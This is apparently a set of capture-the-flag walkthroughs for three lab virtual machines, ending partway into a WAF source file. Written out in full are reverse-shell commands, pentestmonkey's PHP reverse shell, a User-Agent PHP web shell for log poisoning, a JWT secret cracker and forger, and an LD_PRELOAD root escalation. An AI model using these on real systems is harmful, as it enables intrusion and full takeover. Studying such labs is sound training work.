Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
user flag
The scan shows 22 and 80. Port 80 hosts a command-execution feature (a ping-style form): 127.0.0.1;sleep 5 holds the response for about five seconds, which confirms the injection even though no output is shown. Directory scanning had earlier found robots.txt containing a base64 string that decodes to welcome:akared.
I assumed that was an SSH login, but none of the password variants I tried worked, so back to the command injection: 127.0.0.1 && busybox nc 192.168.1.104 4444 -e /bin/bash (busybox's nc still supports -e) gives a reverse shell. With the shell, go and find the user flag.
┌──(root㉿kali-plus)-[~]
└─# nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.105 35044
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@AkaRed:/var/www/html$ ls
index.php robots.txt
www-data@AkaRed:/var/www/html$ cd ..
www-data@AkaRed:/var/www$ cd ..
www-data@AkaRed:/var$ cd ..
www-data@AkaRed:/$ ls
bin home lib32 media root sys vmlinuz
boot initrd.img lib64 mnt run tmp vmlinuz.old
dev initrd.img.old libx32 opt sbin usr
etc lib lost+found proc srv var
www-data@AkaRed:/$ cd home
www-data@AkaRed:/home$ ls
welcome
www-data@AkaRed:/home$ cd welcome
www-data@AkaRed:/home/welcome$ ls
user.txt
www-data@AkaRed:/home/welcome$ cat user.txt
flag{f0a41fdbc520e191db615c3335c6f305}
Privilege escalation - root flag
sudo -l prompts for a password we don't have, so upload linpeas.sh and take a look. First find a directory we can write to: find / -writable -type d 2>/dev/null
www-data@AkaRed:/home/welcome$ find / -writable -type d 2>/dev/null
/dev/mqueue
/dev/shm
/var/lib/php/sessions
/var/tmp
/var/cache/apache2/mod_cache_disk
/run/lock
/run/lock/apache2
/tmp
/proc/5217/task/5217/fd
/proc/5217/fd
/proc/5217/map_files
/tmp is writable, so upload linpeas there and run it. It flags /opt/showmepassword, which asks you to write 1000 lines of a into a file it names and then prints the password. Generate the file with seq 1 1000 | xargs -I {} echo "a" > xxoo
Command breakdown:
seq 1 1000 prints the numbers 1 to 1000, one per line. xargs -I {} runs echo "a" once per input line, substituting the line wherever {} appears; since the command never uses {}, the input only serves as a loop counter, and the result is exactly 1000 lines of a. Check the count with wc -l before running the binary.
www-data@AkaRed:/tmp$ seq 1 1000 | xargs -I {} echo "a" > xxoo
www-data@AkaRed:/tmp$ wc -l xxoo
1000 xxoo
www-data@AkaRed:/opt$ ./showmepassword
input to /tmp/xxoo
when input 1000 count. u will get password.
d2VsY2
That gives the password. strings showmepassword, or opening the binary in IDA, would turn it up as well. With the password, SSH in as welcome and look for an escalation path.
welcome@AkaRed:~$ sudo -l
Matching Defaults entries for welcome on AkaRed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User welcome may run the following commands on AkaRed:
(ALL : ALL) NOPASSWD: /usr/local/bin/stegseek
stegseek is a steghide cracker that also carries steghide's embed and extract modes. Run as root through sudo it reads and writes arbitrary files, so you can either embed your public key into an image and extract it as root into root's authorized_keys, or, simpler, embed /root/root.txt into an image you own and extract it straight back out:
welcome@AkaRed:~$ cd /tmp
welcome@AkaRed:/tmp$ busybox wget http://192.168.1.104:9999/1.jpg
Connecting to 192.168.1.104:9999 (192.168.1.104:9999)
1.jpg 100% |*******************************************************************************************************************************************************************************************| 189k 0:00:00 ETA
welcome@AkaRed:/tmp$ sudo stegseek --embed -cf /tmp/1.jpg -ef /root/root.txt
Enter passphrase:
Re-Enter passphrase:
embedding "/root/root.txt" in "/tmp/1.jpg"... done
welcome@AkaRed:/tmp$ sudo stegseek --extract /tmp/1.jpg
Enter passphrase:
wrote extracted data to "root.txt".
welcome@AkaRed:/tmp$ ls
1.jpg root.txt systemd-private-9083634fc3114dc3a20156d7d4b69b13-apache2.service-J3gU2L systemd-private-9083634fc3114dc3a20156d7d4b69b13-systemd-timesyncd.service-zSK17d
welcome@AkaRed:/tmp$ cat root.txt
flag{0762f42f037bd7d4dd6486a95fd50943}
Tryharder
Information gathering
The target's IP address is 192.168.1.102.
┌──(root㉿kali-plus)-[~]
└─# rustscan -a 192.168.1.102
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner. ____________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
With RustScan, I scan ports so fast, even my firewall gets whiplash
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.1.102:22
Open 192.168.1.102:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-12 16:42 CST
Initiating ARP Ping Scan at 16:42
Scanning 192.168.1.102 [1 port]
Completed ARP Ping Scan at 16:42, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:42
Completed Parallel DNS resolution of 1 host. at 16:42, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:42
Scanning bogon (192.168.1.102) [2 ports]
Discovered open port 80/tcp on 192.168.1.102
Discovered open port 22/tcp on 192.168.1.102
Completed SYN Stealth Scan at 16:42, 0.06s elapsed (2 total ports)
Nmap scan report for bogon (192.168.1.102)
Host is up, received arp-response (0.00092s latency).
Scanned at 2025-04-12 16:42:26 CST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:26:8E:04 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
80 and 22 are open. Port 80 is a 西溪湖科技 corporate page whose links and buttons all go nowhere. The page source contains a comment, /* 调试信息:API路径 /NzQyMjE= */ (debug info: API path /NzQyMjE=), and the base64 decodes to 74221; /74221 is a login page.
user flag
The weak credentials tset/123456 get in. Behind the login is a file-upload feature, but the current user is not admin. The request carries a jwt_token, so the plan is to forge the JWT. First crack the HMAC secret with john (the token saved to a file named tmp):
┌──(root㉿kali-plus)-[~]
└─# john tmp --wordlist=/usr/share/seclists/Passwords/scraped-JWT-secrets.txt
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
jwtsecret123 (?)
1g 0:00:00:00 DONE (2025-04-12 17:21) 20.00g/s 2077Kp/s 2077Kc/s 2077KC/s vhtpc4600..!@2222222fasdhiohDCWQA
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The secret is jwtsecret123. With it, re-sign a modified token using jwt_tool or jwt.io:
┌──(root㉿kali-plus)-[~/jwt_tool]
└─# python3 jwt_tool.py -T -S hs256 -p jwtsecret123 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjMiLCJyb2xlIjoidXNlciIsImV4cCI6MTc0NDQ1Mjc1OX0.VzOxTpkrkMqux_pHC-lKz4FMNLDqwpjRQEGUmAKWWEs
Original JWT:
====================================================================
This option allows you to tamper with the header, contents and
signature of the JWT.
====================================================================
Token header values:
[1] alg = "HS256"
[2] typ = "JWT"
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 0
Token payload values:
[1] sub = "123"
[2] role = "user"
[3] exp = 1744452759 ==> TIMESTAMP = 2025-04-12 18:12:39 (UTC)
[4] *ADD A VALUE*
[5] *DELETE A VALUE* [6] *UPDATE TIMESTAMPS*
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 2
Current value of role is: user
Please enter new value and hit ENTER
> admin
[1] sub = "123"
[2] role = "admin"
[3] exp = 1744452759 ==> TIMESTAMP = 2025-04-12 18:12:39 (UTC)
[4] *ADD A VALUE*
[5] *DELETE A VALUE*
[6] *UPDATE TIMESTAMPS*
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 0
jwttool_2934c15a36deb81263bf9d334baad904 - Tampered token - HMAC Signing:
[+] eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjMiLCJyb2xlIjoiYWRtaW4iLCJleHAiOjE3NDQ0NTI3NTl9.xE4F-HTbP3s2FgaNs71EfZq1a2jB00XgqeBLjrUrtOU
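The same crack-and-forge done by hand, as an added Python example rather than the write-up's own steps (the write-up used john and jwt_tool). ORIGINAL_TOKEN is the token captured from the box; WORDLIST is a constructed stand-in for scraped-JWT-secrets.txt; the helper names are my own. The point worth seeing in code is that an HS256 token is only as strong as its secret: whoever can guess it can mint arbitrary claims, and the server has no way to tell a forged token from a real one.

```python
"""HS256 JWT: crack the secret from a wordlist, then re-sign a tampered payload.

Added example, not the write-up's own tooling. ORIGINAL_TOKEN is the token
captured from the box; WORDLIST is a constructed stand-in for a secrets list.
"""
import base64
import hashlib
import hmac
import json

ORIGINAL_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJzdWIiOiIxMjMiLCJyb2xlIjoidXNlciIsImV4cCI6MTc0NDQ1Mjc1OX0."
    "VzOxTpkrkMqux_pHC-lKz4FMNLDqwpjRQEGUmAKWWEs"
)
WORDLIST = ["secret", "password", "changeme", "jwtsecret123", "supersecret"]  # constructed


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    # JWT segments drop the '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs256(signing_input: bytes, secret: str) -> str:
    return b64url_encode(hmac.new(secret.encode(), signing_input, hashlib.sha256).digest())


def verify(token: str, secret: str) -> bool:
    header, payload, sig = token.split(".")
    expected = hs256(f"{header}.{payload}".encode(), secret)
    return hmac.compare_digest(expected, sig)


def crack_secret(token: str, wordlist):
    """First candidate whose HMAC reproduces the signature, or None."""
    return next((w for w in wordlist if verify(token, w)), None)


def payload_of(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[1]))


def forge(token: str, secret: str, **changes) -> str:
    """Re-sign the token with changed claims; header and key order are kept."""
    header, _, _ = token.split(".")
    claims = payload_of(token)
    claims.update(changes)
    # Compact separators: the same serialisation jwt_tool produces.
    new_payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    signature = hs256(f"{header}.{new_payload}".encode(), secret)
    return f"{header}.{new_payload}.{signature}"


if __name__ == "__main__":
    secret = crack_secret(ORIGINAL_TOKEN, WORDLIST)
    print("secret:", secret)
    if secret:
        admin = forge(ORIGINAL_TOKEN, secret, role="admin")
        print(admin)
        print(payload_of(admin))
```

Because the payload is re-serialised without whitespace and with the original key order, the middle segment of the forged token comes out identical to the one jwt_tool printed above; only the signature depends on the secret.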
With the forged token in hand, swap it in with HackBar and a file-upload button appears; clicking it leads to the upload page. Only jpg and png are accepted, so upload an .htaccess that makes Apache execute the uploaded files as PHP (the usual one-liner is AddType application/x-httpd-php .jpg) and then pentestmonkey's php-reverse-shell:
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
Change the ip and port, request the uploaded file, and the shell comes back. From there, /home/pentester holds the user flag:
www-data@Tryharder:/home/pentester$ ls -al
total 28
drwxr-xr-x 2 pentester pentester 4096 Mar 25 06:46 .
drwxr-xr-x 4 root root 4096 Mar 23 10:46 ..
lrwxrwxrwx 1 root root 9 Mar 22 08:03 .bash_history -> /dev/null
-rw-r--r-- 1 pentester pentester 220 Apr 18 2019 .bash_logout
-rw-r--r-- 1 pentester pentester 3526 Apr 18 2019 .bashrc
-rw-r--r-- 1 root root 58 Mar 25 02:13 .note
-rw-r--r-- 1 pentester pentester 807 Apr 18 2019 .profile
-rw-r--r-- 1 pentester pentester 47 Mar 23 07:08 user.txt
www-data@Tryharder:/home/pentester$ cat user.txt
Flag{c4f9375f9834b4e7f0a528cc65c055702bf5f24a}
Privilege escalation - root flag
The same directory has a hidden .note file:
www-data@Tryharder:/home/pentester$ cat .note
Two cities clashed in tale: Smash Caesar, buddy, to pass.
www-data@Tryharder:/home/pentester$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
pentester:x:1000:1000:Itwasthebestoftimes!itwastheworstoftimes@itwastheageofwisdom#itwastheageoffoolishness$itwastheepochofbelief,itwastheepochofincredulity,&itwastheseasonofLight...:/home/pentester:/bin/bash
xiix:x:1001:1001:A Tale of Two Cities:/home/xiix:/bin/bash
The /etc/passwd entry for pentester carries an unusually long GECOS field: Itwasthebestoftimes!itwastheworstoftimes@itwastheageofwisdom#itwastheageoffoolishness$itwastheepochofbelief,itwastheepochofincredulity,&itwastheseasonofLight... (the opening of A Tale of Two Cities, which the xiix entry and the .note both allude to). Next, look for hidden files: find / -name '.*' 2>/dev/null | grep -Pv 'sys|proc'
www-data@Tryharder:/$ find / -name '.*' 2>/dev/null | grep -Pv 'sys|proc'
/srv/...
/var/www/html/74221/uploads/123/.htaccess
/var/backups/.secret
/var/backups/.secret/.verysecret
/var/backups/.secret/.verysecret/.noooooo
/home/pentester/.profile
/home/pentester/.bashrc
/home/pentester/.bash_logout
/home/pentester/.note
/home/pentester/.bash_history
/home/xiix/.local
/home/xiix/.profile
/home/xiix/.bashrc
/home/xiix/.bash_logout
/home/xiix/.bash_history
/run/network/.ifstate.lock
/usr/src/linux-headers-4.19.0-27-amd64/.config
/usr/src/linux-headers-4.19.0-27-amd64/.kernelvariables
/etc/cron.daily/.placeholder
/etc/cron.hourly/.placeholder
/etc/cron.d/.placeholder
/etc/cron.weekly/.placeholder
/etc/cron.monthly/.placeholder
/etc/skel/.profile
/etc/skel/.bashrc
/etc/skel/.bash_logout
/etc/.pwd.lock
/srv/... is the odd one out (a file named ... is easy to miss in a listing):
www-data@Tryharder:/$ cat /srv/...
Iuwbtthfbetuoftimfs"iuwbsuhfxpsttoguinet@jtwbttieahfogwiseon#iuxatthfageofgpoljthoess%itwbsuiffqocipfbemieg-iuxbsuhffqpdhogjocredvljtz,'iuwasuhesfasooofLjgiu../
It is almost, but not quite, the GECOS string: both are 160 characters long, and wherever they differ the /srv/... character is the passwd character shifted forward by one (t to u, ! to ", s to t), which is the "Smash Caesar" of the .note hint. The write-up I consulted compares the two position by position, writing 0 for a match and 1 for a difference, and reads the result as 8-bit ASCII. paste does the alignment once each string is split to one character per line (a holds the GECOS string, b the contents of /srv/...):
cat a|sed 's/./&\n/g' > aa
cat b|sed 's/./&\n/g' > bb
┌──(root㉿kali-plus)-[~]
└─# paste aa bb|awk '{if($1==$2){printf 0}else{printf 1}}'
01011001001100000101010101011111001101010100110100110100010100110100100000110011010001000101111100110001001101110101111100111000010101010100010001000100010110010
The 161st bit is only the two files' trailing newlines comparing equal and can be dropped; the first 160 bits decode to Y0U_5M4SH3D_17_8UDDY, which is pentester's password:
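The comparison that the paste/awk pipeline performs, as an added Python example (not part of the original write-up): both strings are the ones copied from the box, the bit rule is the one described above, and shift_pattern shows why the hint says Caesar: every character that differs in /srv/... is the /etc/passwd character moved forward by exactly one.

```python
"""Recover the password hidden between pentester's GECOS field and /srv/...

Added example, not part of the original write-up. Both strings are copied
from the box; the rule (0 where the characters match, 1 where they differ,
8 bits per ASCII character) is the one the paste/awk pipeline implements.
"""

# GECOS field of the pentester line in /etc/passwd (copied from the box).
GECOS = (
    "Itwasthebestoftimes!itwastheworstoftimes@itwastheageofwisdom#"
    "itwastheageoffoolishness$itwastheepochofbelief,itwastheepochofincredulity,"
    "&itwastheseasonofLight..."
)

# Contents of /srv/... (copied from the box).
SRV = (
    "Iuwbtthfbetuoftimfs\"iuwbsuhfxpsttoguinet@jtwbttieahfogwiseon#"
    "iuxatthfageofgpoljthoess%itwbsuiffqocipfbemieg-iuxbsuhffqpdhogjocredvljtz,"
    "'iuwasuhesfasooofLjgiu../"
)


def diff_bits(a: str, b: str) -> str:
    """One bit per position: 0 where a and b agree, 1 where they differ."""
    if len(a) != len(b):
        raise ValueError(f"length mismatch: {len(a)} vs {len(b)}")
    return "".join("0" if x == y else "1" for x, y in zip(a, b))


def bits_to_ascii(bits: str) -> str:
    """Pack the bit string 8 at a time; a trailing partial byte is dropped."""
    usable = len(bits) - len(bits) % 8
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, usable, 8))


def recover_password(a: str = GECOS, b: str = SRV) -> str:
    return bits_to_ascii(diff_bits(a, b))


def shift_pattern(a: str, b: str) -> set:
    """How far each differing character was moved; {1} means a Caesar +1 shift."""
    return {ord(y) - ord(x) for x, y in zip(a, b) if x != y}


if __name__ == "__main__":
    print(diff_bits(GECOS, SRV))
    print(recover_password())          # Y0U_5M4SH3D_17_8UDDY
    print(shift_pattern(GECOS, SRV))   # {1}
```

The length check matters: if either string were copied with a stray character, every bit after that point would be misaligned and the output would be garbage rather than an obvious error.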
www-data@Tryharder:/$ su - pentester
Password: Y0U_5M4SH3D_17_8UDDY
pentester@Tryharder:~$ id
uid=1000(pentester) gid=1000(pentester) groups=1000(pentester)
pentester@Tryharder:~$ sudo -l
Matching Defaults entries for pentester on tryharder:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pentester may run the following commands on tryharder:
(ALL : ALL) NOPASSWD: /usr/bin/find
pentester@Tryharder:~$ sudo /usr/bin/find . -exec /bin/sh \; -quit
find: critical error - Segmentation fault (core dumped)
pentester@Tryharder:~$ find . -exec /bin/sh \; -quit
find: critical error - Segmentation fault (core dumped)
The GTFOBins find trick segfaults; I never found out why (it crashes without sudo too, so it is not a sudo problem). Looking for anything related to the other user, find / -name xiix 2>/dev/null, turned up /srv/backdoor.py, which we have no permission to read. The listening ports include 8989; connecting with nc asks for a password, and the only one we have, the one just decoded, is accepted. That drops us into a shell as xiix that is confined to its current directory, so the way forward is to write a public key into xiix's authorized_keys and SSH in properly. Even then we still have no password for sudo. The home directory holds guess_game, a guess-the-number game from 0 to 99 with one attempt per run, so just brute-force it: for i in $(seq 100);do echo 98| ./guess_game ;done
===== 终极运气挑战 / Ultimate Luck Challenge ====
规则很简单: 我心里有个数字(0-99),你有一次机会猜。
I have a number (0-99), you get one guess.
猜对了,我就把属于你的东西给你;猜错了?嘿嘿,后果自负!
Guess right, I'll give your reward; wrong? Hehe, face the consequences!
提示: 聪明人也许能找到捷径。
Hint: Smart ones might find a shortcut.
天哪!你居然猜对了!运气逆天啊!
/ You got it! Amazing luck!
Pass: superxiix
After a good many runs the guess lands and the password superxiix falls out.
xiix@Tryharder:~$ sudo -l
[sudo] password for xiix:
Matching Defaults entries for xiix on tryharder:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=LD_PRELOAD
User xiix may run the following commands on tryharder:
(ALL : ALL) /bin/whoami
env_keep+=LD_PRELOAD is the key. sudo normally strips LD_PRELOAD from the environment, but here it is passed through, so any shared library we name is loaded into /bin/whoami as root before its main() runs, and it does not matter at all how harmless whoami itself is. This is the textbook HackTricks LD_PRELOAD escalation; write pe.c:
#define _GNU_SOURCE            /* setresuid() is a GNU extension */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Constructor: runs inside /bin/whoami before its main(), already as root
 * because sudo has switched uid before the loader pulled this library in. */
static void hijack(void) __attribute__((constructor));

void hijack(void) {
    unsetenv("LD_PRELOAD");        /* don't re-inject into every child of the root shell */
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0, 0, 0);            /* real, effective and saved uid all root */
    system("/bin/bash -p");
}
Build it with gcc -fPIC -shared -o pe.so pe.c -nostartfiles (implicit-declaration warnings, if any, only mean a prototype header is missing and are harmless), then run sudo LD_PRELOAD=./pe.so /bin/whoami; the root shell opens before whoami ever gets to print anything:
xiix@Tryharder:~$ vi pe.c
xiix@Tryharder:~$ gcc -fPIC -shared -o pe.so pe.c -nostartfiles
pe.c: In function ‘_init’:
pe.c:7:5: warning: implicit declaration of function ‘setgid’; did you mean ‘setenv’? [-Wimplicit-function-declaration]
pe.c:8:5: warning: implicit declaration of function ‘setuid’; did you mean ‘setenv’? [-Wimplicit-function-declaration]
xiix@Tryharder:~$ sudo LD_PRELOAD=./pe.so /bin/whoami
[sudo] password for xiix:
root@Tryharder:/home/xiix# id
uid=0(root) gid=0(root) groups=0(root)
root@Tryharder:/home/xiix# ls
guess_game pe.c pe.so
root@Tryharder:/home/xiix# cd /root
root@Tryharder:~# ls
1.c congrats.txt root.txt
root@Tryharder:~# cat root.txt
Flag{7ca62df5c884cd9a5e5e9602fe01b39f9ebd8c6f}
TheWall
Information gathering
The IP is 192.168.1.105; the scan shows 80 and 22. Port 80 serves nothing but HELLO WORLD!. A normal directory scan finds nothing, because after a burst of requests every response turns into a 403: something is rate-limiting. Throttled to one thread with a one-second delay, gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -u http://192.168.1.105 --delay 1s -t 1 does get through, very slowly, and turns up includes.php, an obvious file-inclusion candidate. Fuzzing its parameter name with wfuzz, hiding the 2-character responses an unknown parameter produces (--hh 2), finds display_page. Those misses come back as 200s rather than 404s, which is apparently why the fuzzer could run at full speed without being blocked:
┌──(root㉿kali-plus)-[~]
└─# wfuzz -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.105/includes.php?FUZZ=../../../../../../etc/passwd --hh 2
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.105/includes.php?FUZZ=../../../../../../etc/passwd
Total requests: 220559
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000217298: 200 28 L 41 W 1460 Ch "display_page"
Total time: 1154.698
Processed Requests: 220559
Filtered Requests: 220558
Requests/sec.: 191.0100
Next, try to include the Apache access log at /var/log/apache2/access.log. PHP code placed in the URL is percent-encoded by the time it is written to the log and would never be recognised as PHP, so the one-liner goes into the User-Agent header instead, which Apache logs verbatim:
user flag
GET / HTTP/1.1
Host: 192.168.1.105
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: <?php system($_GET[1]); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Then trigger it through the LFI. If the earlier directory brute force bloated the log, it is worth re-importing the VM first so the included log stays small enough to run cleanly. Wrap the reverse shell in bash -c, because PHP's system() uses /bin/sh and the /dev/tcp redirect only works in bash: http://192.168.1.102/includes.php?display_page=/var/log/apache2/access.log&1=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.104%2F1234%200%3E%261' That gives a shell, and the web root contains waf.php, which explains the 403s:
<?php
class WAF
{
const attempts = 200;
const outTime = 2;
const path = "/var/www/data/";
const dbFile = "waf.db.txt";
const blFile = "waf.bl.txt";
private static function loadClean($dbf) {
$dbf = self::path.$dbf;
if(file_exists($dbf)) {
$db = unserialize(file_get_contents($dbf));
} else {
if (!is_dir(self::path)){
mkdir(self::path);
}
}
if (!is_array($db)){
$db = array();
}
foreach ($db as $row => $sub_array) {
if($sub_array['time'] < time()) {
unset($db[$row]);
}
}
file_put_contents($dbf,serialize($db));
return $db;
}
